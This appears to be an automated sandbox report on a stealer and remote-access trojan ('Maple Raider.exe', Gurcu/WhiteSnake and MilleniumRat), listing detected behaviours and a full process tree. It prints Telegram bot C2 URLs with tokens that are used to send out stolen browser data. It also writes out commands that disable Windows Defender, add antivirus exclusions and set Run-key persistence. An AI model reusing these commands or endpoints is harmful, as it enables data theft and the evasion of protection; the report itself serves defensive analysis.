Analysis

  • max time kernel
    600s
  • max time network
    604s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    05-08-2024 11:01

General

  • Target

    Maple Raider Latest/Maple Raider.exe

  • Size

    34.1MB

  • MD5

    ba1d0780f519ee2807e153d51df5916e

  • SHA1

    03f9b5b21a1911ea068e668b041ff827ca0891d7

  • SHA256

    aefa057d6fb6507bf21f0243fe2c57a8614fdde589faa78b21929e483ff98a29

  • SHA512

    d31b05daeb984427c4b5c476169cdab442723c51324938fc3df700f91ecb35b5b5ba5b1b11297c170fcee0bf2c56d9db7b2ef18b289042eb7a7373745faa9d89

  • SSDEEP

    786432:3p039FS+ab44n6ASQSc6k00CZcKoTMS4uEgbFtNFEtKN:3ps9Fnab4+6DQSc6JUCS1NOK

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0%20kb

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getFile?file_id=BQACAgEAAyEFAASF2AHzAAKIT2awsXzT3ALp3kFQKc1h69RImS59AAI6BwAC-auJRWCvBtVx12EsNQ

https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/sendMessage?chat_id=6024388590

https://api.telegram.org/bot7457548429:AAGMvKYWjBbGXayEC5uoksRl1i2BIy7ylDg/getUpdates?offset=-

https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

  • Modifies WinLogon for persistence 2 TTPs 5 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
  • Contacts a large (5182) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 17 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Loads dropped DLL 48 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 51 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 12 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in System32 directory 18 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 63 IoCs
  • Modifies registry class 26 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:648
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:448
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:704
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:988
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:452
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:952
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1056
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1080
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1192
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1228
                      • C:\Program Files\Google\Chrome\updater.exe
                        "C:\Program Files\Google\Chrome\updater.exe"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:7344
                      • C:\Program Files (x86)\Windows Mail\sihost.exe
                        "C:\Program Files (x86)\Windows Mail\sihost.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:1628
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                      1⤵
                        PID:1280
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1312
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1352
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1428
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2836
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                • Indicator Removal: Clear Windows Event Logs
                                PID:1524
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                1⤵
                                  PID:1596
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1612
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                    1⤵
                                      PID:1692
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1744
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1780
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          1⤵
                                            PID:1840
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                            • Modifies Internet Explorer settings
                                            PID:1892
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:2024
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:2036
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                1⤵
                                                  PID:1752
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                  1⤵
                                                    PID:1940
                                                  • C:\Windows\System32\spoolsv.exe
                                                    C:\Windows\System32\spoolsv.exe
                                                    1⤵
                                                      PID:2112
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                      1⤵
                                                        PID:2252
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                        1⤵
                                                          PID:2332
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                          1⤵
                                                            PID:2472
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                            1⤵
                                                              PID:2480
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k NetworkService -p
                                                              1⤵
                                                              • Drops file in System32 directory
                                                              PID:2532
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                              1⤵
                                                                PID:2604
                                                              • C:\Windows\sysmon.exe
                                                                C:\Windows\sysmon.exe
                                                                1⤵
                                                                  PID:2664
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                  1⤵
                                                                    PID:2672
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                    1⤵
                                                                      PID:2716
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                      1⤵
                                                                        PID:2724
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                        1⤵
                                                                          PID:2916
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:3116
                                                                          • C:\Windows\Explorer.EXE
                                                                            C:\Windows\Explorer.EXE
                                                                            1⤵
                                                                            • Modifies Internet Explorer settings
                                                                            • Modifies registry class
                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                            • Suspicious use of SetWindowsHookEx
                                                                            PID:3248
                                                                            • C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"
                                                                              2⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:3044
                                                                              • C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\Maple Raider Latest\Maple Raider.exe"
                                                                                3⤵
                                                                                • Loads dropped DLL
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2192
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI30442\Build.exe -pbeznogym
                                                                                  4⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:3520
                                                                                  • C:\Users\Admin\AppData\Local\Temp\_MEI30442\Build.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\_MEI30442\Build.exe -pbeznogym
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1776
                                                                                    • C:\ProgramData\Microsoft\hacn.exe
                                                                                      "C:\ProgramData\Microsoft\hacn.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:5020
                                                                                      • C:\ProgramData\Microsoft\hacn.exe
                                                                                        "C:\ProgramData\Microsoft\hacn.exe"
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:716
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI50202\s.exe -pbeznogym
                                                                                          8⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2924
                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI50202\s.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\_MEI50202\s.exe -pbeznogym
                                                                                            9⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4752
                                                                                            • C:\ProgramData\main.exe
                                                                                              "C:\ProgramData\main.exe"
                                                                                              10⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2316
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpE520.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpE520.tmp.bat
                                                                                                11⤵
                                                                                                  PID:7972
                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                    Tasklist /fi "PID eq 2316"
                                                                                                    12⤵
                                                                                                    • Enumerates processes with tasklist
                                                                                                    PID:8084
                                                                                                  • C:\Windows\system32\find.exe
                                                                                                    find ":"
                                                                                                    12⤵
                                                                                                      PID:8096
                                                                                                    • C:\Windows\system32\timeout.exe
                                                                                                      Timeout /T 1 /Nobreak
                                                                                                      12⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:8148
                                                                                                    • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
                                                                                                      12⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks processor information in registry
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:8704
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                        13⤵
                                                                                                          PID:2540
                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
                                                                                                            14⤵
                                                                                                            • Adds Run key to start application
                                                                                                            • Modifies registry key
                                                                                                            PID:6280
                                                                                                        • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe"
                                                                                                          13⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • Modifies registry class
                                                                                                          PID:3012
                                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                                                                                            14⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2492
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                                                                                              15⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:6188
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                16⤵
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:7300
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                                                                                                16⤵
                                                                                                                • Modifies WinLogon for persistence
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                • Drops file in Program Files directory
                                                                                                                • Drops file in Windows directory
                                                                                                                • Modifies registry class
                                                                                                                PID:6260
                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gotw5c3e\gotw5c3e.cmdline"
                                                                                                                  17⤵
                                                                                                                    PID:7408
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      18⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:7756
                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES16AB.tmp" "c:\ProgramData\CSC9BC70CD4387E425CB0DA74B488D1761.TMP"
                                                                                                                      18⤵
                                                                                                                        PID:7780
                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bm3k4s4o\bm3k4s4o.cmdline"
                                                                                                                      17⤵
                                                                                                                        PID:7992
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          18⤵
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:8128
                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1766.tmp" "c:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\CSCE438EDECD79A4374A2FB70BF7D170EB.TMP"
                                                                                                                          18⤵
                                                                                                                            PID:8016
                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\prpp0gmj\prpp0gmj.cmdline"
                                                                                                                          17⤵
                                                                                                                          • Drops file in System32 directory
                                                                                                                          PID:6428
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            18⤵
                                                                                                                              PID:6400
                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1812.tmp" "c:\Windows\System32\CSCC08B8FF068094D489A1981C618666DD1.TMP"
                                                                                                                              18⤵
                                                                                                                                PID:8284
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZE8GQjgdoa.bat"
                                                                                                                              17⤵
                                                                                                                                PID:8808
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  18⤵
                                                                                                                                    PID:8788
                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                    chcp 65001
                                                                                                                                    18⤵
                                                                                                                                      PID:2932
                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                      ping -n 10 localhost
                                                                                                                                      18⤵
                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                      • Runs ping.exe
                                                                                                                                      PID:9036
                                                                                                                                    • C:\Recovery\WindowsRE\System.exe
                                                                                                                                      "C:\Recovery\WindowsRE\System.exe"
                                                                                                                                      18⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                      PID:8728
                                                                                                                    • C:\ProgramData\svchost.exe
                                                                                                                      "C:\ProgramData\svchost.exe"
                                                                                                                      10⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:1916
                                                                                                                      • C:\ProgramData\svchost.exe
                                                                                                                        "C:\ProgramData\svchost.exe"
                                                                                                                        11⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Adds Run key to start application
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:3460
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                          12⤵
                                                                                                                            PID:1632
                                                                                                                      • C:\ProgramData\setup.exe
                                                                                                                        "C:\ProgramData\setup.exe"
                                                                                                                        10⤵
                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        • Drops file in Program Files directory
                                                                                                                        PID:3660
                                                                                                              • C:\ProgramData\Microsoft\based.exe
                                                                                                                "C:\ProgramData\Microsoft\based.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4616
                                                                                                                • C:\ProgramData\Microsoft\based.exe
                                                                                                                  "C:\ProgramData\Microsoft\based.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:3256
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                                                                                                    8⤵
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:3288
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                                                                                                      9⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:1608
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                    8⤵
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:3208
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                      9⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4924
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('join discord.gg/input for support', 0, 'INPUT v2', 48+16);close()""
                                                                                                                    8⤵
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:3176
                                                                                                                    • C:\Windows\system32\mshta.exe
                                                                                                                      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('join discord.gg/input for support', 0, 'INPUT v2', 48+16);close()"
                                                                                                                      9⤵
                                                                                                                        PID:4832
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
                                                                                                                      8⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:3476
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
                                                                                                                        9⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2636
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                      8⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:1328
                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                        tasklist /FO LIST
                                                                                                                        9⤵
                                                                                                                        • Enumerates processes with tasklist
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:832
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                      8⤵
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:4492
                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                        tasklist /FO LIST
                                                                                                                        9⤵
                                                                                                                        • Enumerates processes with tasklist
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:3216
